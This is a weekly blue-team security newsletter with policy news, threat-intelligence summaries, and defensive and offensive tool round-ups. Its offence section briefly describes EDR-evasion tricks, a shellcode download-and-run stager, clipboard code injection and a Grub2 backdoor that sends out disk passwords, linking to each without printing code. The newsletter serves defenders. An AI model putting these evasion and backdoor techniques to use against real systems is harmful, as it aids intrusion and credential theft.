Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading).
Operationally this week ransomware continues to plague. Outside of this is further evidence that no company is immune to breach. From Cloudflare who detected a campaign quickly through to Twilio who fared a little less well when subjected to the same one. Kudos to both for disclosing technical detail and quickly. Cisco also disclosed a breach from March this year which resulted in administrative access being obtained on their domain controllers.
In the high-level this week:
Greek intelligence service boss quits amid wiretapping allegations - the fall out from the use of Predator (a Pegasus competitor) continues..
Thai National Cyber Security Agency signs MoU to collaborate with Huawei - The purpose is to increase cybersecurity skills for Thai IT personnel through promoting Huawei's E-Lab online learning platform, and organizing competition projects and Huawei training courses - China shaping their future operating environment
Help US Companies Compete Against China on Technology Standards - interesting article for several reasons not least the ‘it is unfair’ narrative and the general geo politicisation of standards processes. It likely means we are going to inevitably end up with suboptimal outcomes on all fronts whilst having to expend more effort to mitigate.
A Cyber Policy Portal and the National Cyber Survey is mentioned in the annual progress report of the United Nations Open-Ended Working Group on security of and in the use of information and communications technologies.
SlowMist first half of 2022 blockchain security and anti-money laundering analysis report - this report is in Chinese, but gives an a fascinating insight: A total of 187 security incidents occurred in the first half of 2022, with a loss of US$1.976 billion - 74.6% of the money laundered in security incidents went to Tornado.
US Treasury Sanctions Notorious Virtual Currency Mixer Tornado Cash -almost as if related to the previous, but specifically related to North Korea related cyber activity (at least) - the scale being: since becoming active in August 2019, Tornado Cash has received over $7.6 billion worth of Ethereum, a sizable portion of which have come from illicit or high-risk sources.
Implications of Emerging Privacy Enhancing Technologies for UK Surveillance Policy - from the UK’s new Centre for Emerging Technology and Security based at the Alan Turing Institute - our version of the George Town Center for Security and Emerging Technology.
US Cyber ambassador could soon take on a world of challenges - article outling the challenges for the new ambassador.
US Federal Communications Commission Urges Emergency Alert System (EAS) Participants to Secure EAS Equipment - a worrying state of affairs and likely the result of lax regulation and no mandated resilience assessments.
Network Open Source Traceability - Necessity and Feasibility Analysis of International Cyber Attack Source Traceability Mechanism - by Tang Lan, Director and Researcher of the Cyberspace Security Governance Research Center of the China Institute of Contemporary International Relations. Chinese high-level Internet policy paper which could be read in numerous ways beyond the four challenges it outlines. It provides an interesting insight into how the Chinese government is thinking about control of the cyber attribution narrative.
China launches 272 attempts at spreading disinformation in Taiwan in a week - repercussions from the visit last week.
Chinese technology in the ‘Internet of Things’ poses a new threat to the west - although in the UK’s Financial Times, it isn’t by the FT. A view from a consultancy on the risk posed by cellular components in IoT.
US’s CISA added two new known to be exploited vulnerabilities to their list - tick tock goes the clock for federal agencies to patch these vulnabilities.
Book club this week is Power, Participation, and Private Regulatory Initiatives: Human Rights Under Supply Chain Capitalism:
More recently, many business and human rights advocates have considered the development and enforcement of private regulatory initiatives (PRIs) to certify that actors along the supply chain conform to certain codes of conduct. Many advocates see these PRIs as holding the potential to create better outcomes—whether for workers, affected communities, or the environment—within a global economy structured by supply chain capitalism.
You have to wonder if there is an analogue here with cyber that should be happening? Adjunct is the article How to Achieve Minimum Necessary Rigor which has the observation Excessive rigor can impede progress in research in applied settings. States some obvious facts, but shows how far cyber has to go.
Finally there is a Summer Course in Security and Technology for policy makers and diplomats happening in September run by the UN Institute for Disarmament Research and UN Institute for Training Research. Personally I get excited when we upskill those negotiating and/or defining the future policy environment for us all. It will have a specific focus on the intersection between law, information communication technologies and artificial intelligence.
Enjoying this? don’t get via e-mail? subscribe:
Think someone else would benefit? Share:
Have a lovely Friday,
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Targeted attack on industrial enterprises and public institutions
Chinese industrial control system activity in Russia and beyond. Initial access was via a phishing e-mail and a very old exploit.
In January 2022, [our] ICS CERT experts detected a wave of targeted attacks on military industrial complex enterprises and public institutions in several countries.
The attack targeted industrial plants, design bureaus and research institutes, government agencies, ministries and departments in several East European countries (Belarus, Russia, and Ukraine), as well as Afghanistan.
The attackers were able to penetrate dozens of enterprises and even hijack the IT infrastructure of some, taking control of systems used to manage security solutions.
https://securelist.com/targeted-attack-on-industrial-enterprises-and-public-institutions/107054/
North Korean H0lyGh0st Ransomware Has Ties to Global Geopolitics
An overview of North Korean ransomware operations as they continue to gain access to funds. Interesting they were able to quick flip an n-day vulnerability in their operations, but beyond that little that will come as a surprise.
Once on a victim’s machine, the H0lyGh0st ransomware first exfiltrates a copy of all files prior to encryption. And as one would expect, next comes the demand for ransom. If the victim does not comply and pay up, the threat actor then threatens to publish all of the exfiltrated files online.
Although it has not yet been confirmed exactly how victims’ machines are infected, there is some suspicion that the threat group has used the DotCMS remote code execution vulnerability (CVE-2022-26352), or a similar exploit to gain access to targets before dropping the payload for execution.
https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware
Gwisin Ransomware Targeting Korean Companies
Two bits of reporting on the same ransomware threat coming out of South Korea. Interesting for several reasons, not least the regional focus, the industries being targeted and the multi platform nature.
The cases of Gwisin ransomware attacking Korean companies are recently on the rise. It is being distributed to target specific companies. It is similar to Magniber in that it operates in the MSI installer form. Yet unlike Magniber which targets random individuals, Gwisin does not perform malicious behaviors on its own, requiring a special value for the execution argument. The value is used as key information to run the DLL file included in the MSI.
https://asec.ahnlab.com/en/37483/
[We] discovered a new ransomware family targeting Linux-based systems. The malware, dubbed GwisinLocker was detected in successful campaigns targeting South Korean industrial and pharmaceutical firms. The malware is notable for being a new malware variant produced by a previously little known threat actor, dubbed “Gwisin” (귀신) — a Korean word meaning ‘ghost’ or ‘spirit’ — and targeting systems running the open source Linux operating system. The ransomware is deployed following a substantial network compromise and data exfiltration.
North Korean hacker organization is attacking by impersonating a large domestic portal cloud service
North Korea continue to show they have social engineering game in this campaign. Strong lure theme…
Users need to pay special attention as a series of book-linked hacking attacks disguised as a cloud sharing invitation service by a large domestic portal company are being caught.
The target of this attack is mainly experts and journalists working in the field of North Korea, and the attack is in the form of a phishing email impersonating an actual service to these targets.
The attack carried out on Saturday disguised as if they shared the file 'The history of North Korea's nuclear development and the prospects for the development of U.S.-DPRK relations', and the cloud sharing invitee delivered it by impersonating the name of a person who served as the first deputy director of the National Intelligence Service for foreign affairs and North Korea during the previous government
https://blog-alyac-co-kr.translate.goog/4869?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp
Analysis of APT32 Organization's Attack Activities on my country's Guanji Units
Vietnamese activity in China being outed. Beyond that little of note other than the increasing capability of Chinese cyber firms maybe..
In this incident, the APT32 organization chose the RemyRAT remote control Trojan as a backdoor program and implanted it into the National Guanji Unit.
VileRAT: DeathStalker’s continuous strike at foreign and cryptocurrency exchanges
Pierre Delcher and Giampaolo Dedola out a campaign primarily focused on Russia and using malicious documents as the infection vector. They attribute to an actor called DeathStalker who has cross overs with Evilnum.
Note the sectoral targeting and the lack of apparent direct financial gain intent.
VileRAT, its loader and associated infection chain were continuously and frequently updated for more than two years, and are still leveraged to persistently target foreign currency and cryptocurrency exchange brokers, with a clear intent to escape detection.
We still, however, cannot determine what DeathStalker’s principal intention against such targets is: it could range from due diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding its customers in working around sanctions and/or spying on the targets’ customers, but it still does not appear to be direct financial gain.
https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/
Who Needs Macros? | Threat Actors Pivot to Abusing Explorer and Other LOLBins via Windows Shortcuts
Aleksandar Milenkoski shows how Windows LNK files and living-off-the-land binaries are being chained. Also note the rapid commoditisation of the technique due to production of tooling which enables other to utilise the technique.
Windows Explorer (
explorer.exe
) is the top initial living-off-the-land binary (LOLbin) in the chain of LOLbins that threat actors abuse to execute malware through malicious Windows shortcuts (LNK files).Our mass-analysis of 27510 representative malicious
LNK
files from VirusTotal revealed Windows Explorer at the top of the list (with 87.2% prevalence), followed bypowershell.exe
(7.3%),wscript.exe
(4.4%), andrundll32.exe
(0.5%).LNK
files are currently immensely popular among threat actors for malware deployment and persistence.We have observed intensive advertising of new versions of the mLNK and QuantumBuilder tools for building malicious
LNK
files in the cybercrime web space since May 2022, with many new features for evasion and stealth.The mLNK and QuantumBuilder tools enable threat actors to build malicious
LNK
files in a configurable and convenient manner. Given the popularity ofLNK
files among threat actors, there is an increasing demand for such tools on the cybercrime market.The actors behind the QuantumBuilder tool for building malicious
LNK
files advertise the tool and the value ofLNK
files to threat actors by claiming that Office macros “are for the most part dead” [as a medium for deploying malware], referring to Microsoft’s recent decision to disable by default Office macro execution in the context of documents that originate from untrusted sources.
Pivoting on a SharpExt to profile Kimusky panels for great good
Jason Reaves builds on the work of others to expand understanding of the campaign by North Korea intended to steal e-mails through their browser extension. The work contributes increased understanding of victimology including Europe.
Andariel deploys DTrack and Maui ransomware
Kurt Baumgartner helps attribute this ransomware with technical indicators:
While CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.
He also shows how they (North Korea) first took it for a spin in Japan and earlier than first thought.
On July 7, 2022, the CISA published an alert, entitled, “North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector,” related to a Stairwell report, “Maui Ransomware.”s.
We extend their “first seen” date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.
https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/
The DGA family Orchard continues to change, and the new version uses Bitcoin transaction information to generate DGA domain names
Chinese and translated Chinese reporting on this novel technique. The Chinese reporting was released first, thus its inclusion to allow for compare and contrast. Using Bitcoin wallet information as a variable for DGA input is interesting but also suspectable to disruption I suspect.
Recently we discovered a new botnet that uses Satoshi Nakamoto's Bitcoin account transaction information to generate DGA domain name. Because of the uncertainty of Bitcoin transactions, this technique is more unpredictable than using the common time-generated DGAs, and thus more difficult to defend against.
The technique was discovered in a family of botnets we called Orchard. Since February 2021, this botnet has gone through 3 versions, and even switched programming languages in between.
Unravelling a Mimikatz campaign
Will Thomas shows that UK Computer Misuse Act not withstanding the value of being able to do active discovery on the Internet. Will managed to uncover and disrupt a campaign which appears active in Japan based on one open server. Good lesson in analytical tradecraft.
The key findings were as follows:
The threat actor was active between 22 July and 7 August 2022 (see Figure 3)
There were 78 attacks in total, based on number of files created in the open directory
54 unique IPs were targeted, the vast majority of which were located in Japan, followed by the US, Canada, Ireland, Ukraine, Russia, India, and Australia (see Figure 4)
44 unique IPs were from fixed line IPs on Maxihost Japan (see Figure 5)
Several IPs from the same CIDR range were targeted multiple times on different days
Attacks began mostly around 4am (UTC) and ended most days around 7pm (UTC) (see Figure 6)
https://blog.bushidotoken.net/2022/08/unravelling-mimikatz-campaign.html
An inside view of domain anonymization as-a-service
If the previous post was on the right side of UK law then this post by Benoit ANCEL would be way over the other end and not possible in the UK because of the Computer Misuse Act. They reused a leaked JWT token in order to gain access to a panel allowing them to understand victimology.
From a simple mistake made by an operator, we managed to collect and exploit a lot of precious information from a “Fast Flux” network called BraZZZerS Fast Flux between end of 2018 and 2022.
The admins edited the Nginx configuration file by setting “error_log off” where “off” should actually be a path. The way the virtual hosts were configured ended up writing the error_log in a file called “off” in the html directory!
The logs showed us that the Nemty’s web panel was based (until the last year of Nemty’s life) on socket.io. The polling service was leaking very important information on a GET request: the JWT token. By reusing that token in a cookie, you could access the Nemty’s panel authenticated as the user related to the token:
https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145
New HiddenAds malware affects 1M+ users and hides on the Google Play Store
Dexter Shin shows that basic tradecraft (or cruftware) will get you 1 million installs if you try. The post itself makes is a bit FUD and product placement heavy, but also includes some interesting insights in how how orchestrated the campaign was:
To promote these apps to new users, the malware authors created advertising pages on Facebook.
The authors also understand Android.
This malware uses the Contact Provider. The Contact Provider is the source of data you see in the device’s contacts application, and you can also access its data in your own application and transfer data between the device and online services.
..
The important thing is the Contact Provider automatically interrogates newly installed or replaced packages. Thus, installing a package containing special metadata will always call the Contact Provider automatically.
The first activity defined in the application tag in the manifest file is executed as soon as you install it just by declaring the metadata. The first activity of this malware will create a permanent malicious service for displaying advertisements.
BumbleBee Roasts Its Way to Domain Admin
From our friends at the DFIR report on an April 2022 intrusion. The initial access tradecraft we have covered extensively over the last few months. Punch line is if you have mitigated ISO and LNK files via e-mail you are going to be OK.
During this intrusion, the threat actors gained access using an ISO and LNK file, used several lateral movement techniques, dumped credentials three different ways, kerberoasted a domain admin account and dropped/executed a bespoke tool for discovering privilege escalation paths.
https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/
Raspberry Robin: Highly Evasive Worm Spreads over External Disks
Onur Mustafa Erdogan provides an update on this threat. The point really to take away if that QNAP cloud is being used as a distribution mechanism. This should stick out in most networks as an IoC.
Raspberry Robin is a worm that spreads over an external drive. After initial infection, it downloads its payload through msiexec.exe from QNAP cloud accounts, executes its code through rundll32.exe, and establishes a command and control (C2) channel through TOR connections.
Raspberry Robin is delivered through infected external disks. Once attached, cmd.exe tries to execute commands from a file within that disk. This file is either a .lnk file or a file with a specific naming pattern.
https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks
Novel News on Cuba Ransomware: Greetings From Tropical Scorpius
Anthony Galiette, Daniel Bunce, Doel Santos and Shawn Westfall discuss a ransomware actor who is exhibiting techniques towards the upper end of the sophistication scale. Including using leaked code signing keys.
Here, we start with an overview of the ransomware and focus on an evolution of behavior observed leading up to deployment of Cuba Ransomware. While this behavior was consistent for over a year, [we have] observed some recent changes. This includes providing an overview of the ransomware’s functionality and algorithms, as well as covering the technical details of the tactics, techniques and procedures (TTPs) used by Tropical Scorpius. Specifically, this involves:
A new malware family that [we] track as ROMCOM RAT.
A weaponized local privilege escalation exploit to SYSTEM.
A new Kerberos tool that [we] track as KerberCache.
A kernel driver for targeting security products.
Identifying the use of the ZeroLogon hacktool.
https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/
Discovery
How we find and understand the latent compromises within our environments.
New Version of Microsoft 365 User Activity Report Available
Tony Redmond shows how to use the Microsoft graph API to build a user activity report. Interesting caveats that the API doesn’t capture all user activity.
Microsoft 365 user activity report, a PowerShell script that assembles data from SharePoint Online, Exchange Online, Teams, OneDrive for Business, and Yammer activity to build a picture of how active a user account is, with the intention of removing underused or unused accounts to save on licensing costs.
Recently, a reader pointed out that the usage report API now supports a lookback period of 180 days, doubling the previous 90 days.
The usage report API doesn’t capture data about every possible user activity, nor does it cover all workloads. For instance, there’s no usage API covering Stream and Planner activity.
https://office365itpros.com/2022/08/08/microsoft-365-user-activity-2022/
Persistence Sniper
Federico Lag provides a valuable work aid for incident response and hunt teams.
PersistenceSniper is a Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines.
https://github.com/last-byte/PersistenceSniper
Report on changed Active Directory groups using PowerShell
Harm Veenstra provides a script which will help defence teams monitor key user groups in AD for any unauthorised changes.
[The script] shows the difference in members between the previous time it ran and the current situation, logs [are] saved for reviewing purposes and an email should be sent when there is a change detected.
https://powershellisfun.com/2022/07/13/report-on-changed-active-directory-groups-using-powershell/
Report on Active Directory OU permissions using PowerShell
Harm Veenstra provides another script which will help defence teams spot subtle changes to permissions which may be an attempt at persistence within AD or other indicator of compromise.
The script should be able to scan all OU’s in the Active Directory Domain, but you should also be able to specify a certain OU to start in including all child OU’s. The output should be stored in a CSV file for easy import in Excel or other tools which could report on the data. Things like inheritance should be reported and on what type of objects the permissions were given. (For example when Delegate Control was used for Helpdesk tasks like reset/unlock account etc.)
https://powershellisfun.com/2022/07/21/report-on-active-directory-ou-permissions-using-powershell/
Retrieve Security events from Active Directory using PowerShell
Harm Veenstra achieves a hat trick with this script which can be someone’s morning task to review.
The script should get a list of all events regarding users added/deleted/changed, but also for group membership changes. It should output them in a .csv file and have the possibility to email those changes if found. Also, it should be able to run at an interval and you should be able to specify a time frame in which the events are retrieved.
LNK module for Yara
John Southworth has initiated a pull request for Yara which adds support for LNK file parsing. Given the heavy usage this is a great contribution 👏.
This module will parse the Windows Shell Link (LNK) file format, and make a lot of it's data accessible via YARA
https://github.com/VirusTotal/yara/pull/1732
Defence
How we proactively defend our environments.
MITRE ATT&CK in Google Cloud Platform (GCP): A defender’s cheat sheet
Sometimes the value of this newsletter is I register on those forms so you don’t have to. This was tucked away behind one..
This guide contains a breakdown of tactics we see attackers use most often during attacks in Google Cloud Platform (GCP). To give you a jump start on your own GCP environment, we’ve mapped the GCP services where these tactics often originate (thanks, crafty attackers) along with the API calls they make to execute on these techniques
https://expel.com/wp-content/uploads/2022/08/Expel-GCP-mind-map-kit-080422.pdf
IAM Deescalate
Neat work here building on something we released at NCC Group. This will help teams tighten up their AWS environments.
IAM-Deescalate helps mitigate privilege escalation risk in AWS identity and access management (IAM). It identifies the IAM users and roles with privilege escalation risk using NCC Group's PMapper and creates a set of policies to "deescalate" the risk. IAM-Deescalate was developed when we were working on the Cloud Threat Report Vol. 6.
https://github.com/PaloAltoNetworks/IAM-Deescalate
Sysmon for Linux Pipeline for Elastic Agent
Michael Taggart released some Sysmon for Linux to Elastic glue.
This Ingest Pipeline, which tacks onto your existing syslog pipeline, will process Sysmon Event IDs and provide useful data!
gist.github.com/mttaggart/efc870e02eb603943e0dae8ebd54d3dc
matano: The open-source security lake platform for AWS
Going to buy me some Amazon shares..
Matano is an open source security lake platform for AWS. It lets you ingest petabytes of security and log data from various sources, store and query them in an open Apache Iceberg data lake, and create Python detections as code for realtime alerting. Matano is fully serverless and designed specifically for AWS and focuses on enabling high scale, low cost, and zero-ops.
https://github.com/matanolabs/matano
Protect against AiTM/ MFA phishing attacks using Microsoft technology
Jeffery Appel provides practical steps on how to mitigate the rising instances of attackers doing adversary-in-the-middle (AiTM) to subvert multi-factor authentication. This should be read by all defence teams in Microsoft heavy estates.
In the last couple of weeks, many researchers warns of a new large-scale phishing campaign that is using the adversary-in-the-middle (AiTM) techniques to bypass multi-factor authentication
With the growing enablement/adoption of MFA it is expected that AiTM phishing is growing in the upcoming next years (attackers using new techniques). Protecting against AiTM phishing is important.
Protecting is possible based on various configurations:
Phish-resistant MFA solutions (FIDO/ Certificate based authentication)
Protect attacks using Conditional Access
Monitoring/ protecting using Microsoft 365 Defender/ Azure AD Identity Protection
Build-in alerting rules
https://jeffreyappel.nl/protect-against-aitm-mfa-phishing-attacks-using-microsoft-technology/
How to Attack and Remediate Excessive Network Share Permissions in Active Directory Environments
Scott Sutherland provides an overview of the problem and a new tool to help with risk minimisation.
a new open-source tool called PowerHuntShares that can help streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments.
BlueHound
Will be interesting to see if the number of tool ingest parsers increases for this project. Using a graph database in this manner could be super useful for uncovering threats to environments that would have been previously difficult to find.
BlueHound is an open-source tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network
https://github.com/zeronetworks/BlueHound
Certipy 4.0
Oliver Lyak continues to deliver quality whilst likely causing SpectreOps a degree of heart burn for Bloodhound Enterprise.
A new version of Certipy has been released along with a forked BloodHound GUI that has PKI support! In this blog post, we will look at some of the major new features of Certipy, which includes LDAPS (Schannel) and SSPI authentication, new request options and methods, and of course support for the forked BloodHound GUI that I changed to have new nodes, edges, and prebuilt queries for AD CS. At the end of the blog post, we will also look at the two new privilege escalation techniques for AD CS: ESC9 and ESC10.
Offense
Attack capability, techniques and tradecraft.
SCM Kit
New attack kit just aimed at Source Code Management platforms. Expect threat actor real-world usage in 3..2..
Source Code Management Attack Toolkit - SCMKit is a toolkit that can be used to attack SCM systems. SCMKit allows the user to specify the SCM system and attack module to use, along with specifying valid credentials (username/password or API key) to the respective SCM system. Currently, the SCM systems that SCMKit supports are GitHub Enterprise, GitLab Enterprise and Bitbucket Server. The attack modules supported include reconnaissance, privilege escalation and persistence. SCMKit was built in a modular approach, so that new modules and SCM systems can be added in the future by the information security community.
https://github.com/xforcered/SCMKit
Tampering Syscalls
Rad K provides a neat technique which led to the thread on Twitter
Proof-of-concept for syscall retrieval using hardware break points and exception handling. You can either use this to retrieve syscalls, and/or use it as an alternative to direct syscalls to execute these using the internal state machine.
https://fool.ish.wtf/2022/08/tamperingsyscalls.html
https://github.com/rad9800/TamperingSyscalls
VEH|SEH API Resolve
Rad K provides further headaches for EDR vendors to consider when detecting malicious code based on API usage.
Inspired by Dridex Loader's 32 bit API obfuscation - uses Vectored Exception Handlers on Windows (the hook for detection) to resolve APIs to avoid EDR detection
https://github.com/rad9800/VehApiResolve
D&R Dynamic Shellcode
Orca provides a drop in for a first stage payload.
D.RDynamicShellcode; Download & Run Dynamic Shellcode : it reads the shellcode from a url (has to be downloadable) locate it in a RWX section in memory and run it, useful for people looking for a shellcode as a 1st stage
https://gitlab.com/ORCA000/d.rdynamicshellcode
ClipboardInject - Abusing the clipboard to inject code into remote processes
Mathew provides shows how the clipboard can be used as a inter-process data transfer mechanism which will if leveraged would cause some challenges.
This post describes another code injection technique that I developed a while ago. This time, we will be using the Windows clipboard to transfer an executable payload into another process.
https://www.x86matthew.com/view_post?id=clipboard_inject
Running Exploit As Protected Process Light From Userland
Uses the recently patched (21H2 10.0.19044.1826 (24 July 2022) vuln in Protected Process Light, enabled any code as the highest level of protection, meaning that the exploit will have full access & anti-malware service can't monitor.
Real-World Detection Evasion Techniques in the Cloud
Christopher Doman walks through some in the wild seen evasion techniques in cloud environments. Nothing overly novel in terms of attacker tradecraft, but good training who aren’t familiar.
Persist Assist
Grimmie brings show us Windows persistence techniques become commoditised with this new framework.
Fully modular persistence framework - written in C#. All persistence techniques contain a cleanup method which will server to remove the persistence aside from the persistence code.
https://github.com/FortyNorthSecurity/PersistAssist
Backdooring Grub2
Nicholas Starke shows a nice end to end technique for when dealing with LUKS volume passwords. Also shows the need for bootloader to be cryptographically signed.
I wanted to accomplish was to send the cleartext LUKS password to a remote server when the password is entered as part of the Grub2 boot process
https://nstarke.github.io/grub2/bootloader/2022/08/07/backdooring-grub2.html
Entropy Fix
Orca releases another tool which will frustrate some detection techniques.
a tool to reduce the entropy of your payload, It works By adding null bytes, in an ordered sequence: every 10 bytes it adds 5 null bytes - designed to avoid high entropy detection
https://gitlab.com/ORCA000/entropyfix
Backdooring Office Structures. Part 2
Mariusz Banach shows how code can be squirreled away in various parts of Microsoft Office file structures. Still needs code to extract and use however.
This blog post discusses yet another technique, which as far as I’m concerned – represents a novel, stealthy primitive for storing larger chunks of data that could be easily extracted using specific VBA logic. We introduce an idea of weaponising Custom XML parts storage, available in MS Word, Excel and PowerPoint for the purpose of concealing initial access payloads.
https://mgeeky.tech/payload-crumbs-in-custom-parts/
Vulnerability
Our attack surface.
Looking at Patch Gap Vulnerabilities in the VMware ESXi TCP/IP Stack
Shows that forking open source means attackers can operate in a world of n-days if vendors don’t keep pace, which they didn’t in this case..
The most interesting outcome of this analysis is that ESXi’s TCP/IP stack is based on FreeBSD 8.2 and does not include security patches for the vulnerabilities disclosed over the years since that release of FreeBSD.
K14649763: Overview of F5 vulnerabilities (August 2022)
Lots and lots, technical security debt appears very real. Probably a case study to be done here from the genesis vulnerabilities and subsequent exploitation which brought the product to the attention of researchers and the resulting forced payback of said tech debt payback.
I wrote a post on this in December, 2011 titled Breaking the Inevitable Niche/Vertical Technology Security Vulnerability Lifecycle which had this graphic:
Feels like they are in the fourth segment..
https://support.f5.com/csp/article/K14649763
Apple Safari IDN URL Spoofing
A patched vulnerability in Apple Safari IDN handling allows attackers to perform a URL Spoofing as Safari does not convert inappropriate Unicode from URL Bar to Punycode.
https://ssd-disclosure.com/ssd-advisory-apple-safari-idn-url-spoofing/
Uncal Maker an attack on Ethereum's consensus mechanism
Can be used by miners to obtain consistently higher mining rewards compared to the honest protocol.
Researching Open Source apps for XSS to RCE flaws
Why XSS remains powerful..
In this article I’ll show how to achieve a Remote Code Execution via XSS on the examples of Evolution CMS, FUDForum, and GitBucket.
https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/
Exploitation
What is being exploited.
Microsoft SharePoint Server WizardConnectToDataStep4 Deserialization Of Untrusted Data RCE
Patched during the June update of SharePoint - allows authenticated attackers that are able to create a Site on the server to cause it to execute arbitrary code.
Tooling and Techniques
Low level tooling for attack and defence researchers.
ImHex Pattern and YARA Functionality
Using ImHex to build understanding of structured content and how to use the built-in YARA functionality.
https://blog.xorhex.com/blog/quickimhexpatternyaratutorial/
YARA for (malware/implant) config extraction
Abdallah Elshinbary shows how complex Yara rules can be written to extract the configuration of implants.
https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/
Finding hooks with WinDBG
Oliver Bachtik provides a nice walkthrough on the techniques useful for offensive and defence researchers on Windows alike.
I’ve developed the methods discussed here by myself and they have been proven to be useful for me. I was assigned to evaluate the security and the inner working of a specific application control solution. I needed a practical and easy solution, without too much coding preferably using windbg. For that I wanted to be able to:
Detect the DLL which performs hooking
Detect all the hooks that it sets up
Restore all the previous instructions (before the hook)
https://blog.nviso.eu/2022/08/05/finding-hooks-with-windbg/
Footnotes
Some other small bits and bobs which might be of interest.
Industrial Ransomware Analysis: Q2 2022 - sounds really scary - 43 ransomware groups target industrial organizations and infrastructures - I doubt 43 groups target, as opposed to have touched, but happy to be schooled.
Ransomware Task Force Releases Blueprint for Ransomware Defense
Old MacDonald had a smart farm: Building a testbed to study cybersecurity in smart dairy farming -
How Passwordless Works - explains how passwordless can be implemented using modern technologies such as Web Authentication (WebAuthn), while at the same time providing better user experience and security than the traditional password-based
Dos and Don'ts of Machine Learning in Computer Security - New paper presented at USENIX.
UN Cybercrime Negotiation Insights - a podcast featuring a big tech company and a human rights organisation.
Organized crime and instability: Mapping illicit hubs in West Africa (including cyber) - event happening in September.
That’s all folks.. until next week..